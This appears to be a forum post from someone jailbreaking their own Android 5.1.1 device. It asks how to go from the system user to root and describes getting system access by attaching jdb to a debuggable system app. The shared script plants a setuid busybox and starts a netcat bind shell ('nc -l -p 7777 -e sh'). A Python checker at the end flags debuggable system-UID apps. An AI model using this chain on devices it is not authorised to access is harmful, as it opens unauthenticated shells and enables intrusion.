Wednesday, 13 July 2016

Hacking android, got "system" user, but not root, how to escalate privilege?



Hello, I am new to XDA. I am trying to jailbreak my Android device:
Android 5.1.1, Linux 3.10.49

This device is a rare brand and has no unlock & flash mechanism.

Currently I have successfully got the "system" user (UID 1000) by using a preinstalled DEBUGGABLE system app.
This user can only change the /data directory etc.; it cannot change any file owned by root.

So any help to escalate the "system" user to root will be very much appreciated.

The result of the command "id":


Code:

uid=1000(system) gid=1000(system) groups=1000(system),1007(log),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3006(net_bw_stats),3009(qcom_diag),9997(everybody),41000(u0_a31000) context=u:r:system_app:s0


This account can change /data/system/packages.xml etc., but cannot change /system/*, nor chown/mount.....
Its CapBound is 0, too strict. It also cannot disable SELinux.

Can anyone help me?


----------------------- PS: sharing how I got system user privilege, maybe helpful to others -----------------------
In a word, just use jdb to attach to the app, then print new java.lang.Runtime().exec("sh /sdcard/my.sh").

First, I found a package that appeared in Android Device Monitor's debuggable app list, e.g. com.example.app.
Then I used

Code:


pm dump com.example.app

and confirmed it uses the system UID, then

Code:


run-as com.example.app

but it failed with "Package not found", I don't know why.

Then I tried the JDWP way.
Get the debuggable process ID:

Code:


$ adb jdwp
9424
$ adb forward tcp:8600 jdwp:9424
$ jdb -attach localhost:8600
> threads
group system:
  (java.lang.Thread)0x2a86 Signal Catcher        ...
  (java.lang.Thread)0x2a87 FinalizerWatchdogDaemon ...
  ...
group main:
  (java.lang.Thread)0x2a8d main                  ...
  (java.lang.Thread)0x2a8e Binder_1              ...
  ...
> thread 0x2a8d
main[1] stepi
>
stepi completed: "thread=main", android.os.MessageQueue.next(), row=145 bci=22

main[1] > print new java.lang.Runtime().exec("sh /sdcard/qj.sh")


There are some files that need to be uploaded (adb push ....) before running the last command.

/sdcard/qj.sh:

Code:


date > /sdcard/log
cp -f /sdcard/busybox /data/ 2>> /sdcard/log || exit 1
chmod 4777 /data/busybox 2>> /sdcard/log || exit 1
(while true; do /data/busybox nc -l -p 7777 -e sh; done) >> /sdcard/log 2>&1 &
echo server OK >> /sdcard/log


/sdcard/busybox:
this file can be found at busybox.net/downloads/binaries/latest; choose ARMv7.


The above jdb command "print new java.lang.Runtime().exec("sh /sdcard/qj.sh")" will create a shell server listening on port 7777, bridging input/output to sh.

So, to connect to the shell server,

Code:


adb forward tcp:7777 tcp:7777
nc localhost 7777


then in this connection, input shell commands.

Sorry, I forgot a very important step: to run the "print new ...." statement, I have to turn on the screen, even touch the app, so it can be trapped into jdb.

---------That's all------------
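The root cause the post relies on is a shipped app that is both debuggable and running under the shared system UID, which is exactly what a device integrator should audit for before release. As an added example (not from the original post), here is a small checker that parses `adb shell dumpsys package` output and flags such packages; the sample output is constructed, and the "Package [name] (hash):" / "userId=" / "flags=[ ... ]" layout is assumed to match the device under audit.

```python
import re
from typing import Dict, List

# Constructed sample of `adb shell dumpsys package` output (not from a real device).
# The block layout is an assumption about the format on the audited device.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.app] (3f2a1b):
    userId=1000
    codePath=/system/priv-app/ExampleApp
    flags=[ SYSTEM DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ]
  Package [com.example.other] (7c9d0e):
    userId=10031
    codePath=/data/app/com.example.other-1
    flags=[ DEBUGGABLE HAS_CODE ALLOW_BACKUP ]
  Package [com.example.settings] (1d4e5f):
    userId=1000
    codePath=/system/priv-app/Settings
    flags=[ SYSTEM HAS_CODE ALLOW_CLEAR_USER_DATA ]
"""

SYSTEM_UID = 1000  # the "system" user (uid=1000) shown in the post's `id` output


def parse_packages(dump: str) -> Dict[str, dict]:
    """Split dumpsys output into {package_name: {"uid": int|None, "flags": set}}."""
    packages: Dict[str, dict] = {}
    current = None
    for line in dump.splitlines():
        m = re.match(r"\s*Package \[([^\]]+)\]", line)
        if m:  # start of a new package block
            current = m.group(1)
            packages[current] = {"uid": None, "flags": set()}
            continue
        if current is None:
            continue
        m = re.match(r"\s*userId=(\d+)", line)
        if m:
            packages[current]["uid"] = int(m.group(1))
        m = re.match(r"\s*flags=\[([^\]]*)\]", line)
        if m:
            packages[current]["flags"] = set(m.group(1).split())
    return packages


def debuggable_privileged(dump: str) -> List[str]:
    """Packages that are debuggable AND run as the system UID: JDWP-attachable system shells."""
    return sorted(name for name, info in parse_packages(dump).items()
                  if "DEBUGGABLE" in info["flags"] and info["uid"] == SYSTEM_UID)


if __name__ == "__main__":
    for name in debuggable_privileged(SAMPLE_DUMPSYS):
        print(f"FAIL: {name} is debuggable and runs as uid {SYSTEM_UID}")
```

On a real device, pipe `adb shell dumpsys package` into `parse_packages`; any hit means a release build shipped with `android:debuggable` still set, and the fix is in the app's build, not the device.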


